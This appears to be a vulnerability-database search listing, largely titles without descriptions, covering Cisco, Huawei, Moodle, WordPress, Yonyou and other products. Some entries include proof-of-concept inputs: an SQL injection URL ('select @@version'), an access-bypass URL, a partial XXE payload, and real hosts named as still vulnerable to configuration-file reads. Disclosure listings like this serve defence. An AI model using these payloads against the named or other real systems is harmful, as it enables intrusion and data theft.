56796 matches found
Cisco Firepower 9000 Series Switches Clickjacking Vulnerability
No description provided by source...
Moodle Denial-of-Service Vulnerability (CNVD-2015-07725)
No description provided by source...
Novell openSUSE dracut Package Symlink Vulnerability
No description provided by source...
zTree Cross-Site Scripting Vulnerability
No description provided by source...
Moodle Cross-Site Request Forgery Vulnerability (CNVD-2015-07726)
No description provided by source...
SQLite fts3_tokenizer Remote Code Execution Vulnerability
No description provided by source...
Moodle Security Bypass Vulnerability (CNVD-2015-07730)
No description provided by source...
wpa_supplicant Denial-of-Service Vulnerability
No description provided by source...
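WordPress Neuvoo-Jobroll Plugin Cross-Site Scripting Vulnerability
Vulnerability summary: WordPress is a blogging platform developed in PHP by the WordPress Foundation; it supports setting up personal blog sites on servers running PHP and MySQL. Neuvoo-Jobroll is a job-listing aggregation plugin for it. A cross-site scripting vulnerability exists in the WordPress Neuvoo-Jobroll plugin because the program does not sufficiently filter user-submitted input. When a user browses an affected site, their browser executes arbitrary script code supplied by the attacker. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. The vulnerability exists in version 2.0 of the WordPress Neuvoo-Jobroll plugin; other versions may also be affected....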
EMC VPLEX GeoSynchrony Local Information Disclosure Vulnerability
No description provided by source...
D-Link DIR-615 PING and Send Email Buffer Overflow Vulnerability
No description provided by source...
Denial-of-Service Vulnerability in Multiple Huawei eSpace Switches
No description provided by source...
FreeType 'sfnt/ttcmap.c' Heap Buffer Overflow Vulnerability
No description provided by source...
DHCP Denial-of-Service Vulnerability in Multiple Huawei Products
No description provided by source...
GNU a2ps Format String Denial-of-Service Vulnerability
No description provided by source...
Cisco Firepower 9000 Series Local Denial-of-Service Vulnerability
No description provided by source...
HP Operations Orchestration Cross-Site Request Forgery Vulnerability
No description provided by source...
Multiple Arbitrary File Read Vulnerabilities in Cisco Firepower 9000 Series
No description provided by source...
Cisco Firepower 9000 Series Local Command Injection Vulnerability
No description provided by source...
IBM Installation Manager /tmp Local Command Injection Vulnerability
No description provided by source...
JosephErnest Void Cross-Site Scripting Vulnerability
No description provided by source...
Huawei eSpace U2980 and U2990 Denial-of-Service Vulnerability
No description provided by source...
Huawei AR Router Directory Traversal Vulnerability
No description provided by source...
Oracle Beehive 'playAudioFile.jsp' Remote Code Execution Vulnerability
No description provided by source...
Google AdWords API 'WSDLInterpreter/WSDLInterpreter.php' Arbitrary PHP Code Execution Vulnerability
No description provided by source...
latex2rtf Format String Denial-of-Service Vulnerability
No description provided by source...
Tibbo Technology AggreGate Privilege Escalation Vulnerability
No description provided by source...
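Yonyou Seeyon A6 Collaborative Office System SQL Injection Vulnerability with DBA Privileges
Brief description: RT Detailed description: I searched and it has not been submitted before. The vulnerability is in the S1 parameter of the file /yyoa/common/js/menu/test.jsp. Cases: http://.../yyoa/common/js/menu/test.jsp?doType=101&S1=select%20@@version http://.../yyoa/common/js/menu/test.jsp?doType=101&S1=select%20@@version ...:8080/yyoa/common/js/menu/test.jsp?doType=101&S1=select%20@@version...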
Free WMA MP3 Converter Buffer Overflow Vulnerability
No description provided by source...
Huawei Router VPN Routing and Forwarding Hopping Vulnerability
No description provided by source...
Huawei eSpace Unified Gateway Denial-of-Service Vulnerability
No description provided by source...
Cisco Firepower 9000 Firepower Extensible Operating System File Read Vulnerability
No description provided by source...
TestLink HTML Injection Vulnerability
No description provided by source...
Multiple Vulnerabilities in NXFilter
No description provided by source...
D-Link DIR-601 Command Injection Vulnerability
No description provided by source...
AlienVault Unified Security Management Remote Code Execution Vulnerability
No description provided by source...
Tibbo Technology AggreGate Remote Code Execution Vulnerability
No description provided by source...
AlienVault Unified Security Management Local Privilege Escalation Vulnerability
No description provided by source...
TestLink Cross-Site Request Forgery Vulnerability
No description provided by source...
Newphoria applican Framework Cross-Site Scripting Vulnerability
No description provided by source...
Information Disclosure Vulnerability in Multiple Huawei Routers
Summary: The CF cards on some Huawei switches and ARs contain some sensitive information in plaintext. Once an attacker gets such a CF card, it may result in the leak of sensitive information (HWPSIRT-2015-07048). This vulnerability has been assigned Common Vulnerabilities and Exposures CVE ID:...
Spiffy Directory Traversal Vulnerability
No description provided by source...
Google AOSP Email for Android Open Redirect Vulnerability
The Google AOSP Email App is vulnerable to HTML Injection on the email body. It allows a remote attacker to be able to send a crafted email with a payload that redirects the user to a target URL as soon as he opens the email. This issue is not related to the email provider configured on the app...
Huawei eSpace 8950 IP Phone Denial-of-Service Vulnerability
No description provided by source...
AfterLogic WebMail Arbitrary File Inclusion Vulnerability
No description provided by source...
WordPress < 4.1.2 Stored XSS vulnerability
No description provided by source...
AfterLogic WebMail settings.xml Information Disclosure
No description provided by source...
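Generic Vulnerability in a Yonyou System Affecting Multiple Banks, Securities Firms, Energy Companies and Enterprises
Brief description: A generic vulnerability in a Yonyou system allows configuration files to be read. Detailed description: A generic vulnerability in a Yonyou system affects multiple banks, securities firms, energy-sector companies and enterprises. I tested some of the sites; a large number of other sites still have this vulnerability. http://zhaopin.cnooc.com.cn/hrss/dorado/smartweb2.RPC.d?rpc=true http://nc.hbny.com.cn:9090/hrss/dorado/smartweb2.RPC.d?rpc=true http://59.173.0.46:8070/hrss/dorado/smartweb2.RPC.d?rpc=true...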
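Wukong CRM Improper Data Permission Control Allows Access Bypass
Brief description: Improperly designed permission checks can be bypassed. An employee can access any other employee's data and share, modify and delete it. Detailed description: The user mia is not responsible for any customers and has had no customers shared with mia. By iterating over the id, customers created by the user test can be accessed, e.g. http://crm.demo.5kcrm.com/index.php?m=customer&a=view&id=596&content= Proof of vulnerability: The users mia and test have no superior-subordinate relationship. mia can access customers that test has not shared. mia can share that customer with any employee...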
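TRS Portal Personalized Portal Arbitrary File Read (Part 2)
Brief description: Found an entity injection vulnerability in another link of the portal personalized portal. Detailed description: TRS Portal personalized portal: the link http://XX.XX.XX.XX/portal/help/wcmhelpaddeditdowith.jsp does not filter external entities, so external entities can be invoked and parsed, allowing arbitrary files on the server to be read. Proof of vulnerability: Exploitation process: http://XX.XX.XX.XX/portal/help/wcmhelpaddeditdowith.jsp POST request: ObjectXML=%0d%0a%20%20%25remote;%0d%0a%5D%0d%0a...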